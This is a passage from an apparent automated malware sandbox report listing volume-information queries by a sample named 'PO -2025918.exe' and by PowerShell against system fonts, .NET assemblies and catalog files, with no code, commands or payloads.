Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Users\user\Desktop\PO -2025918.exe VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
